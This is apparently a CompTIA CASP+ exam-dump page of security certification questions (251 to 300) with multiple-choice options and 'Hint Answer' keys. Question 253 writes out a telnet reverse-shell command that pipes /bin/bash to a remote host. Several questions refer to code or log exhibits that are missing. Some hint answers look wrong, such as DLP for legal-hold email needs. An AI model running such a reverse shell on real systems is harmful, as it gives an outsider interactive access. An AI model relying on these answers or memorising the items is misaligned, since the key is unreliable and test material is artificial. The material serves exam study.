CompTIA Advanced Security Practitioner Topic 6
Question #: 251
Topic #: 1
A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.)
A. Implement complex, key-length API key management.
B. Implement user session logging.
C. Implement time-based API key management.
D. Use SOAP instead of restful services.
E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.
F. Enforce MFA on the developers’ workstations and production systems.
Hint Answer: AC
Question #: 252
Topic #: 1
When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed. Which of the following BEST meets this requirement?
A. Mobile device management with remote wipe capabilities
B. Passwordless smart card authorization with biometrics
C. Next-generation endpoint detection and response agent
D. Full disk encryption with centralized key management
Hint Answer: D
Question #: 253
Topic #: 1
A penetration tester inputs the following command:
telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344
This command will allow the penetration tester to establish a:
A. port mirror.
B. network pivot.
C. reverse shell.
D. proxy chain.
Hint Answer: C
Question #: 254
Topic #: 1
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. CI/CD deployment failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
Hint Answer: B
Question #: 255
Topic #: 1
A security engineer is reviewing a record of events after a recent data breach incident that involved the following:
• A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets.
• A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
• The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection.
Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?
A. Dynamic analysis
B. Secure web gateway
C. Software composition analysis
D. User behavior analysis
E. Stateful firewall
Hint Answer: C
Question #: 256
Topic #: 1
A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?
A. MD5-based envelope method
B. HMAC_SHA256
C. PBKDF2
D. PGP
Hint Answer: B
Question #: 257
Topic #: 1
A software assurance analyst reviews an SSH daemon’s source code and sees the following:
Based on this code snippet, which of the following attacks is MOST likely to succeed?
A. Race condition
B. Cross-site scripting
C. Integer overflow
D. Driver shimming
Hint Answer: C
Question #: 258
Topic #: 1
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt?
A. OSINT
B. ISO
C. MITRE ATT&CK
D. OWASP
Hint Answer: B
Question #: 259
Topic #: 1
A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication. Which of the following will need to be implemented to achieve this objective? (Choose three.)
A. Least privilege
B. VPN
C. Policy automation
D. PKI
E. Firewall
F. Continuous validation
G. Continuous integration
H. IaaS
Hint Answer: ACF
Question #: 260
Topic #: 1
A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s Infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements?
A. Block all outbound traffic and implement an inline firewall.
B. Allow only wireless connections and proxy the traffic through a network tap.
C. Establish an air-gapped network and implement an IDS.
D. Use a separate VLAN with an ACL and implement network detection and response.
Hint Answer: D
Question #: 261
Topic #: 1
A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort?
A. objdump
B. OllyDbg
C. FTK Imager
D. Ghidra
Hint Answer: D
Question #: 262
Topic #: 1
A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?
A. Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs.
B. Perform software composition analysis and remediate vulnerabilities found in the software.
C. Perform reverse engineering on the code and rewrite the code in a more secure manner.
D. Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.
Hint Answer: B
Question #: 263
Topic #: 1
A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario form happening again?
A. Performing routine tabletop exercises
B. Implementing scheduled, full interruption tests
C. Backing up system log reviews
D. Performing department disaster recovery walk-throughs
Hint Answer: B
Question #: 264
Topic #: 1
An organization developed an incident response plan. Which of the following would be BEST to assess the effectiveness of the plan?
A. Requesting a third-party review
B. Generating a checklist by organizational unit
C. Establishing role succession and call lists
D. Creating a playbook
E. Performing a tabletop exercise
Hint Answer: E
Question #: 265
Topic #: 1
A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network?
A. Implement network access control to perform host validation of installed patches.
B. Create an 802.1X implementation with certificate-based device identification.
C. Create a vulnerability scanning subnet for remote workers to connect to on the network at headquarters.
D. Install a vulnerability scanning agent on each remote laptop to submit scan data.
Hint Answer: D
Question #: 266
Topic #: 1
A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.)
A. The new source feature of the web browser
B. The logs from the web server
C. The inspect feature from the web browser
D. A tcpdump from the web server
E. An HTTP interceptor
F. The website certificate viewed via the web browser
Hint Answer: CE
Question #: 267
Topic #: 1
A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files. Which of the following techniques is the analyst MOST likely using?
A. Honeypot
B. Deception
C. Simulators
D. Sandboxing
Hint Answer: B
Question #: 268
Topic #: 1
Users are claiming that a web server is not accessible. A security engineer is unable to view the Internet Services logs for the site. The engineer connects to the server and runs netstat – an and receives the following output:
Which of the following is MOST likely happening to the server?
A. Port scanning
B. ARP spoofing
C. Buffer overflow
D. Denial of service
Hint Answer: D
Question #: 269
Topic #: 1
An architect is designing security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements:
• Services must be able to be reconstituted quickly from a known-good state.
• Network services must be designed to ensure multiple diverse layers of redundancy.
• Defensive and responsive actions must be automated to reduce human operator demands.
Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)
A. Increased efficiency by embracing advanced caching capabilities
B. Geographic distribution of critical data and services
C. Hardened and verified container usage
D. Emulated hardware architecture usage
E. Establishment of warm and hot sites for continuity of operations
F. Heterogeneous architecture
G. Deployment of IPS services that can identify and block malicious traffic
H. Implementation and configuration of a SOAR
Hint Answer: BEH
Question #: 270
Topic #: 1
A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?
A. Implement iterative software releases
B. Revise the scope of the project to use a waterfall approach.
C. Change the scope of the project to use the spiral development methodology.
D. Perform continuous integration.
Hint Answer: A
Question #: 271
Topic #: 1
A third-party organization has implemented a system that allows it to analyze customers’ data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?
A. Asynchronous keys
B. Homomorphic encryption
C. Data lake
D. Machine learning
Hint Answer: B
Question #: 272
Topic #: 1
Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?
A. Zigbee
B. Wi-Fi
C. CAN
D. Modbus
E. DNP3
Hint Answer: A
Question #: 273
Topic #: 1
A software development company is building a new mobile application for its social media platform. The company wants to gain its users’ trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust. To support users’ trust, the company has released the following internal guidelines:
• Mobile clients should verity the identity of all social media servers locally.
• Social media servers should improve TLS performance of their certificate status.
• Social media servers should inform the client to only use HTTPS.
Given the above requirements, which of the following should the company implement? (Choose two.)
A. Quick UDP internet connection
B. OCSP stapling
C. Private CA
D. DNSSEC
E. CRL
F. HSTS
G. Distributed object model
Hint Answer: BF
Question #: 274
Topic #: 1
Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization.
Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy?
A. Align the exploitability metrics to the predetermined system categorization.
B. Align the remediation levels to the predetermined system categorization.
C. Align the impact subscore requirements to the predetermined system categorization.
D. Align the attack vectors to the predetermined system categorization.
Hint Answer: C
Question #: 275
Topic #: 1
A cloud engineer is tasked with improving the responsiveness and security of a company’s cloud-based web application. The company is concerned that international users will experience increased latency.
Which of the following is the BEST technology to mitigate this concern?
A. Caching
B. Containerization
C. Content delivery network
D. Clustering
Hint Answer: C
Question #: 276
Topic #: 1
An organization thinks that its network has active, malicious activity on it. Which of the following capabilities would BEST help to expose the adversary?
A. Installing a honeypot and other decoys
B. Expanding SOC functions to include hunting
C. Enumerating asset configurations
D. Performing a penetration test
Hint Answer: A
Question #: 277
Topic #: 1
An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:
mbedTLS: ca certificate is undefined
Which of the following is the root cause of this issue?
A. iOS devices have an empty root certificate chain by default.
B. OpenSSL is not configured to support PKCS#12 certificate files.
C. The VPN client configuration is missing the CA private key.
D. The iOS keychain imported only the client public and private keys.
Hint Answer: D
Question #: 278
Topic #: 1
A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process?
A. tcpdump
B. netstat
C. tasklist
D. traceroute
E. ipconfig
Hint Answer: B
Question #: 279
Topic #: 1
In a shared responsibility model for PaaS, which of the following is a customer’s responsibility?
A. Network security
B. Physical security
C. OS security
D. Host infrastructure
Hint Answer: C
Question #: 280
Topic #: 1
A security engineer notices the company website allows users to select which country they reside in, such as the following example:
https://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?
A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references
Hint Answer: D
Question #: 281
Topic #: 1
A bank has multiple subsidiaries that have independent infrastructures. The bank’s support teams manage all these environments and want to use a single set of credentials. Which of the following is the BEST way to achieve this goal?
A. SSO
B. Federation
C. Cross-domain
D. Shared credentials
Hint Answer: B
Question #: 282
Topic #: 1
A SaaS startup is maturing its DevSecOps program and wants to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with remediation. The startup began its early security testing efforts with DAST to cover public-facing application components and recently implemented a bug bounty program. Which of the following will BEST accomplish the company’s objectives? (Choose two.)
A. IAST
B. RASP
C. SAST
D. SCA
E. WAF
F. CMS
Hint Answer: AD
Question #: 283
Topic #: 1
Which of the following indicates when a company might not be viable after a disaster?
A. Maximum tolerable downtime
B. Recovery time objective
C. Mean time to recovery
D. Annual loss expectancy
Hint Answer: A
Question #: 284
Topic #: 1
During an incident, an employee’s web traffic was redirected to a malicious domain. The workstation was compromised, and the attacker was able to modify sensitive data from the company file server. Which of the following solutions would have BEST prevented the initial compromise from happening? (Choose two.)
A. DNSSEC
B. FIM
C. Segmentation
D. Firewall
E. DLP
F. Web proxy
Hint Answer: AC
Question #: 285
Topic #: 1
A software company wants to build a platform by integrating with another company’s established product. Which of the following provisions would be MOST important to include when drafting an agreement between the two companies?
A. Data sovereignty
B. Shared responsibility
C. Source code escrow
D. Safe harbor considerations
Hint Answer: B
Question #: 286
Topic #: 1
A security administrator sees several hundred entries in a web server security log that are similar to the following:
The network source varies, but the URL, status, and user agent are the same. Which of the following would BEST protect the web server without blocking legitimate traffic?
A. Replace the file xmlrpc.php with a honeypot form to collect further IOCs.
B. Automate the addition of bot IP addresses into a deny list for the web host.
C. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL.
D. Block every subnet that is identified as having a bot that is a source of the traffic.
Hint Answer: B
Question #: 287
Topic #: 1
An organization had been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is MOST likely to meet the organization’s requirements?
A. ChaCha20
B. ECDSA
C. Blowfish
D. AES-GCM
E. AES-CBC
Hint Answer: A
Question #: 288
Topic #: 1
Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?
A. E-discovery
B. Review analysis
C. Information governance
D. Chain of custody
Hint Answer: A
Question #: 289
Topic #: 1
A domestic, publicly traded, online retailer that sells makeup would like to reduce the risks to the most sensitive type of data within the organization but also the impact to compliance. A risk analyst is performing an assessment of the collection and processing of data used within business processes. Which of the following types of data pose the GREATEST risk? (Choose two.)
A. Financial data from transactions
B. Shareholder meeting minutes
C. Data of possible European customers
D. Customers’ shipping addresses
E. Deidentified purchasing habits
F. Consumer product purchasing trends
Hint Answer: AC
Question #: 290
Topic #: 1
A security engineer is creating a single CSR for the following web server hostnames:
• wwwint.internal
• www.company.com
• home.internal
• www.internal
Which of the following would meet the requirement?
A. SAN
B. CN
C. CA
D. CRL
E. Issuer
Hint Answer: A
Question #: 291
Topic #: 1
A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation. Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience. The current architecture includes:
• Directory servers
• Web servers
• Database servers
• Load balancers
• Cloud-native VPN concentrator
• Remote access server
The MSP must secure this environment similarly to the infrastructure on premises. Which of the following should the MSP put in place to BEST meet this objective? (Choose three.)
A. Content delivery network
B. Virtual next-generation firewall
C. Web application firewall
D. Software-defined WAN
E. External vulnerability scans
F. Containers
Hint Answer: BCE
Question #: 292
Topic #: 1
A security analyst has been tasked with providing key information in the risk register. Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Choose two.)
A. Password cracker
B. SCAP scanner
C. Network traffic analyzer
D. Vulnerability scanner
E. Port scanner
F. Protocol analyzer
Hint Answer: BD
Question #: 293
Topic #: 1
An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization’s new email system provide?
A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements
Hint Answer: A
Question #: 294
Topic #: 1
A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following:
1. The company has sensitive data.
2. The company has proprietary data.
3. The company has its headquarters in Iceland, and the data must always reside in that country.
Which cloud deployment model should be used?
A. Hybrid cloud
B. Community cloud
C. Public cloud
D. Private cloud
Hint Answer: D
Question #: 295
Topic #: 1
When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client?
A. Data
B. Storage
C. Physical security
D. Network
Hint Answer: A
Question #: 296
Topic #: 1
Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Choose two.)
A. Proxy
B. Tunneling
C. VDI
D. MDM
E. RDP
F. MAC address randomization
Hint Answer: AB
Question #: 298
Topic #: 1
An organization does not have visibility into when company-owned assets are off network or not connected via a VPN. The lack of visibility prevents the organization from meeting security and operational objectives. Which of the following cloud-hosted solutions should the organization implement to help mitigate the risk?
A. Antivirus
B. UEBA
C. EDR
D. HIDS
Hint Answer: C
Question #: 299
Topic #: 1
A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks. Which of the following would BEST enable this activity?
A. ISAC
B. OSINT
C. CVSS
D. Threat modeling
Hint Answer: A
Question #: 300
Topic #: 1
A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst reviewed the event logs and found the following:
• PAM had not been bypassed.
• DLP did not trigger any alerts.
• The antivirus was updated to the most current signatures.
Which of the following MOST likely occurred?
A. Exploitation
B. Exfiltration
C. Privilege escalation
D. Lateral movement
Hint Answer: D
